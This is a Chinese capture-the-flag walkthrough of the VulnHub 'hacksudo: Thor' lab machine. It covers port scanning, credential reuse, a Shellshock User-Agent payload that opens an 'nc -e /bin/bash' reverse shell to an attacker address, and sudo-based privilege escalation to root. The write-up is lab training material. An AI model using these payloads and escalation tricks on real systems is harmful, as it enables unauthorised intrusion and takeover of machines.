靶场下载地址:
https://download.vulnhub.com/hacksudo/hacksudo---Thor.zip
信息搜集
一、Nmap进行扫描
nmap -sP 192.168.106.0/24 #对自己的靶机网段进行存活探测,获取靶机地址
nmap -T4 -A -p- 192.168.106.133 #对目标进行全端口扫描
二、WEB服务探测
通过扫描发现目标开放了21、22、80端口
对目标进行目录爆破
查看news.php页面发现cgi-bin,说明使用了CGI技术
发现存在README.md文件
通过阅读README.md得知该系统源码托管在Github上
https://github.com/zakee94/online-banking-system/tree/master/net-banking
并且获取到了系统默认的用户密码
admin password123
通过admin用户进行登录
http://192.168.106.133/home.php #无法登录成功
http://192.168.106.133/admin_login.php # 成功登录
通过点击页面查看发现存在4个用户名,点击获取到他们的密码
zakee94 nafees123'
salman salman123'
tushar tushar123'
jon snow123'
爆破http://192.168.106.133/cgi-bin/目录下的文件,查看是否存在cgi脚本
存在以下文件:
/cgi-bin/backup.cgi
/cgi-bin/shell.sh/
/cgi-bin/shell.sh
对目标进行扫描,发现目标存在CVE-2014-6271、CVE-2021-42071、rce-user-agent-shell-shock漏洞
使用rce-user-agent-shell-shock漏洞反弹shell
User-Agent: () { :; }; echo; echo; /bin/sh -c 'nc -e /bin/bash 192.168.106.128 4444'
使用python升级shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
三、提权
通过sudo -l 发现拥有thor用户的hammer.sh文件权限
发现该脚本发现可以以thor用户权限执行系统命令
使用bash命令切换到thor用户
再次通过sudo -l查看发现thor用户拥有root用户的cat权限和service权限
使用service程序成功提权为root用户
sudo service ../../bin/sh
原文始发于微信公众号(渗透笔记):HACKSUDO: THOR靶场实战
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论